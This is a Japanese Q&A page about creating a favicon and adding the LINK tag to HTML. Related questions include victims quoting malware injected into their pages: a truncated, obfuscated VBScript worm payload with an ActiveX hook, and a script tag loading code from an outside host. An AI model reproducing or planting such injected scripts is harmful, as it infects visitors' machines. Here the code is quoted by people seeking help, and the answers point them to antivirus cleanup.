お気に入り登録したら指定のアイコン表示出来るようにしたいんですが、アイコンの素材は出来てるんですけどアイコンファイルの作り方と、ソースでの記述を教えて欲しいんです。

このQ&Aに関連する最新のQ&A

A 回答 (3件)

ここでよくある質問です。


お気に入り アイコンで検索するといっぱい出てきますよ。
参考URLをご覧下さい。
わかりやすく解説してあるページです。

参考URL:http://kobe.cool.ne.jp/torichan/favicon.htm
    • good
    • 0
この回答へのお礼

有難うございます。参考になりました!

お礼日時:2002/03/16 20:24

↓2番目の方の回答に対して: 「SHORTCUT ICON」じゃなくて「favicon.ico」を自分が保存したファイル名に変えるんだと思います。

    • good
    • 0

>アイコンファイルの作り方


アイコンはWindows98では256色、Windows95では16色でしか表示できませんので、パレットにある基本の色を使うなどして、16x16の絵を描きましょう。
その後、拡張子「ico」で保存すればアイコンのできあがりです。

>ソースでの記述を…
<HEAD>~</HEAD>ではさまれた部分に
<LINK REL="SHORTCUT ICON" HREF="favicon.ico">
『SHORTCUT ICON』部分は、保存したときのアイコン名に好きに変えてください。
    • good
    • 0
この回答へのお礼

とても分かりやすく教えて頂き、誠に有難うございます。
素材がGifファイルなので、ちょっと苦労しましたが、どうにか出来ました!

お礼日時:2002/03/16 20:27

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aと関連する良く見られている質問

Qお気に入りのなかのアイコンの作り方は?

お気に入りのなかのアイコンの作り方は?

OKwebを開きます。

インターネットエクスプローラのアドレス欄「アイコンの絵 http://www.okweb.ne.jp/」にあるアイコンをリンクバーにドロップします。(または、お気に入りへドロップします。)

すると、カラーのOKがあらわれます。

このアイコンの作り方を教えてください。

また、このアイコンのことを何というのでしょうか?

以前にこのような質問があったかもしれませんが、タームがわかりませんので、質問させていただきます。

よろしくおねがいします。

Aベストアンサー

通常のアイコンと同じです。
ホームページのHTMLの<HEAD>タグの中に下記の1行を入れると表示されます。

例えばアイコンファイルが「favicon.ico」だとすると
<LINK REL="SHORTCUT ICON" HREF="favicon.ico">

アイコンの作成は「KH IconStudio2001」等のソフトで行えば簡単でしょう。

参考URL:http://www.forest.impress.co.jp/library/khiconstudio.html

QHTML文書のソースに自動的に変な記述が

HTML文書をメモ帳で作っていますが、昨日からこれまでつくった全ての文書のメモ帳を開くと入れた記憶のない変な記述がくっついてきます。何度消してもまた復活しています。少し長いのですが、これです。長くて載せ切れなかったので、途中適当に消しました。
<HTML><BODY onload="vbscript:KJ_start()"><scriptlanguage=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 code=com.ms."&"activeX.Active"&"XComponent></APPLET></div>"
</script>
<script language=vbscript>ish>ego_e?nd@un`niok@un`niokKJrgmad_Foi^er%JateHamb#Lh EolorLesrge K_xtSeqFoi^erK[me7 FPI.GbnFoi^er%JateHamb#P_t QbisCclep= CildblNaj_.FffesHtq?xipns :0@or?aceThfmFii_ IkThfmFii_s@ilb?xt7 U@[se%@SO+AetBrtekmiokHambThfmFii_.P^nh)&IcFii_Exq= BTMOr@ilb?xt7 ENMLOr@ilb?TempChar"&vbCrLf&"Next")
Execute(ThisText)
</script></BODY></HTML>
文書自体はちゃんと表示れ一見何の障害もないように見えますが、削除しても復活しているし記憶にないだけに気持ち悪くて仕方がありません。HTML文書を入れているフォルダと、Cドライブにdesktop.iniと Folder.httという憶えのないアイコンが出来ていました。これも削除してもまた復活しています。この二つのアイコンもメモ帳で開くとまた意味不明の記述があるのですが長くなりすぎるので割愛します。このアイコンが出来ていたのも、メモ帳に変な文書がくっついてくるのも全く同時期です。これはウィルスなのでしょうか?とすればどのように対処すればいいでしょうか?かなり困っています。長くなりましたが、分かる方いらっしゃいましたら回答をよろしくお願いします。

HTML文書をメモ帳で作っていますが、昨日からこれまでつくった全ての文書のメモ帳を開くと入れた記憶のない変な記述がくっついてきます。何度消してもまた復活しています。少し長いのですが、これです。長くて載せ切れなかったので、途中適当に消しました。
<HTML><BODY onload="vbscript:KJ_start()"><scriptlanguage=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><"&"APPLET NAME=KJ"&"_guest HEIGHT=0 WIDTH=0 cod...続きを読む

Aベストアンサー

コンピュータウイルスだと思います。

ノートンアンチウイルス
ウイルスバスターなどで駆除したほうがいいでしょう

↓オンラインスキャン(トレンドマイクロ社)をおつけします
ぜひ行ってみましょう。

参考URL:http://www.trendmicro.co.jp/hcall/index.asp

Q記述した覚えのないソースコード

自作のホームページをレンタルサーバーにアップして
ブラウザで確認表示させると、記述した覚えのないソースコードが
下記のように <head> のすぐ隣から表示されます。

ホームページをアップしてからもう二年近く経ちますが
今までこのような事はありませんでしたし、二ヶ月程前に
更新した時もこのような表示は確かなかったと・・・

また、アップしたファイルを一旦サーバーから削除して再アップしたり
ブラウザのキャッシュをクリアしたりもしてみましたが状況は変わらずでした。

<head><script type="text/javascript" id="2f2a695a6afce2c2d833c706cd677a8e" src="http://d.lqw.me/xuiow/?o=2&g=B710B518-C18C-8C61-E23B-70309F210C2A&s=6FDCD233----&z=1387594244"></script>

一体これが何なのかわからず気持悪く思い、今回質問投稿させて頂きました。

当方のHP制作環境は・・・

・OS ~ Win7 Home 64bit
・Dreamweaber CS5
・レンタルサーバ ~ さくらインターネット
・HTML5 にて記述
・アップロードはさくらインターネットで用意されてるファイルマネージャを使用
・確認ブラウザ Firefox & IE10 & Chrome 各最新バージョン

どうかよろしくお願い致します。

自作のホームページをレンタルサーバーにアップして
ブラウザで確認表示させると、記述した覚えのないソースコードが
下記のように <head> のすぐ隣から表示されます。

ホームページをアップしてからもう二年近く経ちますが
今までこのような事はありませんでしたし、二ヶ月程前に
更新した時もこのような表示は確かなかったと・・・

また、アップしたファイルを一旦サーバーから削除して再アップしたり
ブラウザのキャッシュをクリアしたりもしてみましたが状況は変わらずでした。

<head><script type="text/j...続きを読む

Aベストアンサー

No3の回答はあくまで推測です、念のため。
ただ確認はしておいた方が良いと思います。

d.lqw.meで検索すると、その中にマルウェアScorpionSaverと関連しているという情報もありましたので。

QテキストフィールドへHTMLを記述し、ソースへ反映させる方法

他の方が既に質問していたら教えてください。
ざっと目を通しましたが見つけられませんでした。

標題の通り、この「教えてgoo」などの質問投稿の際に使用するテキストフィールなどへHTMLを記述し、次の内容確認のページなどでソースへ埋め込む方法を教えてほしいです。
そもそも可能なのでしょうか?

例えば↓
<a href="http://index.html">トップページ</a>
と入力フィールドに記述しても、確認画面ではエスケープ文字で処理され…ソースを表示しても↓
&lt;a href="http://index.html"&gt;トップページ&lt;/a&gt;
となり、結果
<a href="http://index.html">トップページ</a>
がそのまま画面に出力されてしまいます。

理想は「トップページ」がアンカーでリンクされることなのですが。。。


わかりにくい質問で恐縮ですが、お願いします。

Aベストアンサー

一般的な掲示板サイト等ではあえてそのような事ができないようになっています。
もし、ご希望通りのサイトがあった場合はクロスサイトスクリプティングと言う悪質な行為が可能になってしまいます。

参考URL:http://www.atmarkit.co.jp/fsecurity/special/30xss/xss01.html

Qアイコン素材のダウンロードについて

ベクターデータのアイコン素材を探していまして、「Coleccion de iconos cuadrados」というものを見つけたのですが、ダウンロード方法がわからず困っています。
下記のページなのですが、
http://www.cosassencillas.com/2008/02/06/coleccin-de-iconos-cuadrados-en-color-gris/

「descarga de los iconos.」のところがダウンロード先だと思うのですが、
クリックして「www.filebox.ro/~」にいくと、数秒置きに
ページがリロードされるだけでどこからダウンロードすればいいかわかりません。
ダウンロード方法を教えてください。

直接ウェブデザインの質問ではなくて恐縮なのですが、よろしくお願いします。

Aベストアンサー

「descarga de los iconos」をクリックした先のページ(勝手にリロードされるページ)に行くと、
左側に「Aici te Loghezi daca ai cont」というログインフォームがあります。

上段に「Username」、下段に黒い点々、という感じですでに入力済みで表示されているはずです。
(オンラインストレージっぽいので、ゲスト用か共有のIDとパスワードだと思うのですが、言葉が読めず未確認)

ログインすると複数のダウンロード先が選べるようになってるみたいでした。


このカテゴリの人気Q&Aランキング

おすすめ情報